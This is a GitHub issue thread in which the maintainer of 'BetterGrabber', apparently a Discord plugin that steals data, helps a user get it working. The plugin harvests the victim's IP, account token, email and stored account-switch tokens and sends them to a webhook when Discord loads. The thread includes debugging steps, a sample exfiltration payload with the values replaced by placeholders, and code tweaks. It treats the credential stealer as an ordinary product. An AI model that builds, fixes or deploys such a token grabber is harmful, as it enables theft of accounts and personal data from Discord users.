### ISSUE TITLE
TypeError: Cannot read property 'innerText' of undefined at HideMe.load

### ISSUE THREAD

**Issue by Rinkerbel** [HideakiAtsuyo/BetterGrabber#11]
![image](https://cdn.has-cool.pics/TGoYPDn99R.png)
I made sure to fill in the config correctly but I had this error pop up
What do I do?

**Comment by HideakiAtsuyo** [comment]
> ![image](https://camo.githubusercontent.com/072b429adb2edee4988ffff6868cc120c284ebde98d46ad4053007201ee3b06e/68747470733a2f2f63646e2e6861732d636f6f6c2e706963732f54476f5950446e3939522e706e67) I made sure to fill in the config correctly but I had this error pop up What do I do?

Screenshot the line of the error or console.log each value and screenshot the entire result thanks.

**Comment by Rinkerbel** [comment]
Aight, I'll be at work for a few hours, I'll send you the info when I'm home.

**Comment by HideakiAtsuyo** [comment]
> Aight, I'll be at work for a few hours, I'll send you the info when I'm home.

Perfect

**Comment by Rinkerbel** [comment]
> Screenshot the line of the error or console.log each value and screenshot the entire result thanks.

So, screenshotting the line of the error wasn't too hard, here you go:
![image](https://cdn.has-cool.pics/D13ihgnAbJ.png)

I was wondering though, how do you properly use console.log()?
I tried searching on how to use it, but most of it went beyond me as I have barely any js knowledge.
What should I have entered into the console to properly use console.log()?

**Comment by HideakiAtsuyo** [comment]
> > Screenshot the line of the error or console.log each value and screenshot the entire result thanks.
> 
> So, screenshotting the line of the error wasn't too hard, here you go: ![image](https://camo.githubusercontent.com/50ced0b60ac8a64f33e0a38703caa06380c2959471f9d818deb905764ca2a621/68747470733a2f2f63646e2e6861732d636f6f6c2e706963732f4431336968676e41624a2e706e67)
> 
> I was wondering though, how do you properly use console.log()? I tried searching on how to use it, but most of it went beyond me as I have barely any js knowledge. What should I have entered into the console to properly use console.log()?

```js
console.log(document.getElementsByClassName("size14-e6ZScH title-eS5yk3"))
```

**Comment by HideakiAtsuyo** [comment]
It should work now, download the plugin again and tell me the result.

**Comment by Rinkerbel** [comment]
> It should work now, download the plugin again and tell me the result.

I'm not getting any error is the console anymore, but the webhook doesn't report anything, I'm pretty sure my config is correct tho.
![image](https://cdn.has-cool.pics/F4toBxqTtT.png)
I noticed that when I disable or enable the plugin, a toast pops up but, the console displays nothing.

**Comment by HideakiAtsuyo** [comment]
> I'm
Yes you have to refresh Discord :)

**Comment by Rinkerbel** [comment]
> Yes you have to refresh Discord :)

Well yes, I did that multiple times before reporting.
I also tried removing all themes and plugins except the logger but it still didn't work.

**Comment by HideakiAtsuyo** [comment]
> > Yes you have to refresh Discord :)
> 
> Well yes, I did that multiple times before reporting. I also tried removing all themes and plugins except the logger but it still didn't work.

Use the updated plugin with your webhook and refresh.

**Comment by HideakiAtsuyo** [comment]
Actually it work for me: 

![](https://i.imgur.com/upJefoW.png)<br>![](https://i.imgur.com/5S4M0fR.png)

**Comment by HideakiAtsuyo** [comment]
Actually it work for me:
![](https://i.imgur.com/upJefoW.png)<br>![](https://i.imgur.com/2ys9XAd.png)

**Comment by HideakiAtsuyo** [comment]
Now it should grab when:

- Enable(click disable then enable)
- Load Discord

**Comment by Rinkerbel** [comment]
Well, this is hella weird, It kind off works but something is broken for me.
When I reload, the message that the webhook is supposed to send does send to the console but not to the webhook?
![image](https://cdn.has-cool.pics/FFLXPCY5FU.png)
![image](https://cdn.has-cool.pics/IO5dqy2Vjm.png)

**Comment by HideakiAtsuyo** [comment]
Send the entire content of the json result for pD

**Comment by Rinkerbel** [comment]
{"content":"@everyone","username":"Hello World","avatar_url":"https://cdn.discordapp.com/avatars/908070943329488916/35ebf6d….webp?size=80","tts":false,"embeds":[{"title":"Hello World","description":"[GitHub](https://github.com/HideakiAtsuyo/BetterGrabber)","color":3553599,"fields":[{"name":"IP","value":"`My_IP_address`","inline":false},{"name":"Actual User Token","value":"`My_Actual_User_Token`","inline":true},{"name":"Actual User Tag With ID","value":"`Rinkerbel` - (`445451396624416779`)","inline":true},{"name":"Actual User email","value":"`My_Actual_email`","inline":true},{"name":"Trusted Domains List","value":"```\nnull```","inline":false},{"name":"Stored Tokens(From Switch Account Feature :) (ID:Token))","value":"```json\n{\"445451396624416779\":\"Stored_Token_one\",\"926451410327994378\":\"Stored_Token_two\",\"930968758258925608\":\"Stored_Token_three\"}```","inline":false},{"name":"Verified Games & Programs","value":"```json\n{\"Fe\":true,\"Pine\":true}```","inline":false}]}]}

**Comment by Rinkerbel** [comment]
> {"content":"@everyone","username":"Hello World","avatar_url":"[https://cdn.discordapp.com/avatars/908070943329488916/35ebf6d….webp?size=80","tts":false,"embeds":[{"title":"Hello](https://cdn.discordapp.com/avatars/908070943329488916/35ebf6d%E2%80%A6.webp?size=80%22,%22tts%22:false,%22embeds%22:%5B%7B%22title%22:%22Hello) World","description":"[GitHub](https://github.com/HideakiAtsuyo/BetterGrabber)","color":3553599,"fields":[{"name":"IP","value":"`My_IP_address`","inline":false},{"name":"Actual User Token","value":"`My_Actual_User_Token`","inline":true},{"name":"Actual User Tag With ID","value":"`Rinkerbel` - (`445451396624416779`)","inline":true},{"name":"Actual User email","value":"`My_Actual_email`","inline":true},{"name":"Trusted Domains List","value":"`\nnull`","inline":false},{"name":"Stored Tokens(From Switch Account Feature :) (ID:Token))","value":"`json\n{\"445451396624416779\":\"Stored_Token_one\",\"926451410327994378\":\"Stored_Token_two\",\"930968758258925608\":\"Stored_Token_three\"}`","inline":false},{"name":"Verified Games & Programs","value":"`json\n{\"Fe\":true,\"Pine\":true}`","inline":false}]}]}

I replaced my sensitive information with something else obviousley

**Comment by HideakiAtsuyo** [comment]
> {"content":"@everyone","username":"Hello World","avatar_url":"[https://cdn.discordapp.com/avatars/908070943329488916/35ebf6d….webp?size=80","tts":false,"embeds":[{"title":"Hello](https://cdn.discordapp.com/avatars/908070943329488916/35ebf6d%E2%80%A6.webp?size=80%22,%22tts%22:false,%22embeds%22:%5B%7B%22title%22:%22Hello) World","description":"[GitHub](https://github.com/HideakiAtsuyo/BetterGrabber)","color":3553599,"fields":[{"name":"IP","value":"`My_IP_address`","inline":false},{"name":"Actual User Token","value":"`My_Actual_User_Token`","inline":true},{"name":"Actual User Tag With ID","value":"`Rinkerbel` - (`445451396624416779`)","inline":true},{"name":"Actual User email","value":"`My_Actual_email`","inline":true},{"name":"Trusted Domains List","value":"`\nnull`","inline":false},{"name":"Stored Tokens(From Switch Account Feature :) (ID:Token))","value":"`json\n{\"445451396624416779\":\"Stored_Token_one\",\"926451410327994378\":\"Stored_Token_two\",\"930968758258925608\":\"Stored_Token_three\"}`","inline":false},{"name":"Verified Games & Programs","value":"`json\n{\"Fe\":true,\"Pine\":true}`","inline":false}]}]}

It seem to be valid. But I will update a few things for example the null value shouldn't be like that :)

**Comment by HideakiAtsuyo** [comment]
I will push an update today. (Actually my time: 8:20 AM i'm French)

**Comment by Rinkerbel** [comment]
Well, than we're in the same timezone which is nice. (Am dutch)

**Comment by HideakiAtsuyo** [comment]
> Well, than we're in the same timezone which is nice. (Am dutch)

It should work perfectly now.

**Comment by Rinkerbel** [comment]
So, everything work perfectly for me. For some reason it didn't work at first so I decided to use a webhook in a completely new server which worked perfectly.
So I figured something must be wrong with my server settings so I changed back to the previous webhook to try and figure it out. But that wasn't needed as for some reason it worked this time. So thanks a lot for helping me out!

There were a few things I noticed though:
1. It reported my nitro status as none even though I am subscribed to nitro classic
2. For verified Games & Programs it only reports Fe and Pine which are not verified
![verified in webhook](https://cdn.has-cool.pics/MRufPkfBbO.png)
![verified in discord](https://cdn.has-cool.pics/S0cvTUd7mP.gif)

**Comment by HideakiAtsuyo** [comment]
> So, everything work perfectly for me. For some reason it didn't work at first so I decided to use a webhook in a completely new server which worked perfectly. So I figured something must be wrong with my server settings so I changed back to the previous webhook to try and figure it out. But that wasn't needed as for some reason it worked this time. So thanks a lot for helping me out!
> 
> There were a few things I noticed though:
> 
> 1. It reported my nitro status as none even though I am subscribed to nitro classic
> 2. For verified Games & Programs it only reports Fe and Pine which are not verified
>    ![verified in webhook](https://camo.githubusercontent.com/4fd777d3f134a209bc8552049b148620737d401171e21537ce0c887a1a990dde/68747470733a2f2f63646e2e6861732d636f6f6c2e706963732f4d527566506b6642624f2e706e67)
>    ![verified in discord](https://camo.githubusercontent.com/05c9602eb490babb5b1c1d6e713c01a07836d10a9ee31ef0a4a4ef3f58b884af/68747470733a2f2f63646e2e6861732d636f6f6c2e706963732f53306376545564376d502e676966)

For the Nitro status I will just move it to a normal with a switch case to directly get the good sub since it's only a plugin on GitHub no one case about the code, for tha verified games & programs I can't promise anything I think it's the ones that you launched the most recently since I take them from the LocalStorage, I will try to fix both ! :)

**Comment by Rinkerbel** [comment]
Ahh, well I ran ccleaner like a day ago so that might be interfering with the game / program detections

**Comment by HideakiAtsuyo** [comment]
> > For the Nitro status I will just move it to a normal with a switch case to directly get the good sub since it's only a plugin on GitHub no one case about the code, for tha verified games & programs I can't promise anything I think it's the ones that you launched the most recently since I take them from the LocalStorage, I will try to fix both ! :)
> 
> Ahh, well I ran ccleaner like a day ago so that might be interfering with the game / program detections

I don't think, I think it's in the memory until you close Discord or reboot your computer.

**Comment by HideakiAtsuyo** [comment]
For Nitro I did something more clean than `actualUserPremiumState == 2 ? "Boost" : actualUserPremiumState == 1 ? "Classic" : "No" ` => `["No", "Classic", "Boost"][actualUserPremiumState]` like that if it's 0 => "No", 1 => "Classic", 2 => "Boost"

**Comment by HideakiAtsuyo** [comment]
I think the issue is Solved since I don't have any clue for the verified games & programs open a new issue and reference this one if you have a problem mentinnned here.
